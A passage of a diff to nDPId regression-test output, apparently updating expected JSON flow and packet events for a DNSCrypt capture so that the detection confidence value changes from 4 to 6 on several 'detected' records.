AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":42141,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":42141,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":533,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396111} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":533,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAABQKewAuX4RrG8KAAABa6o5IgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":534,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396111} @@ -1087,24 +1087,24 @@ 00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":946739396218,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":946739396218,"pkt":"ZmZmZmZmRERERERECABFAADcvzkAADQRYU9rqjkiCgAAAQG7pJ0AyPvgszCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAcAMABAAAQAAAAAAfXxETlNDAAIAAI\/a1gzqXBRkeMMNLdByUsrCAeXq9pAoSIZvWZO078wHKN5t9zokYno4cH1X8DUwDBTmKYZNXI496f2ZPTyfGw7EiDsrhQ4a28OXE48fibQ4VcAHxN0Yn+p8BQ7Bz9i\/KcWIOyuFDhrbX1Oowl9TqMJfVPpC"} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":56988,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAIcPTRAAH4RwyoKAAABucF\/9N6cAbsCCPyL\/I8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":56988,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":56988,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":50062,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAIc9\/NAAH4RCGsKAAABucF\/9MOOAbsCCPyL\/IsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":50062,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":50062,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":59354,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAIcPTVAAH4RwykKAAABucF\/9OfaAbsCCPyL\/I0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":59354,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":59354,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":54920,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02428{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAXcPTYgAH4R32gKAAABucF\/9NaIAbsGBKQ8\/IwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":54920,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":54920,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":546,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739400460} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":546,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAABQPTYAuX4RBDwKAAABucF\/9AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":46314,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02428{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAXcPTggAH4R32YKAAABucF\/9LTqAbsGBMXY\/I4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":46314,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":46314,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 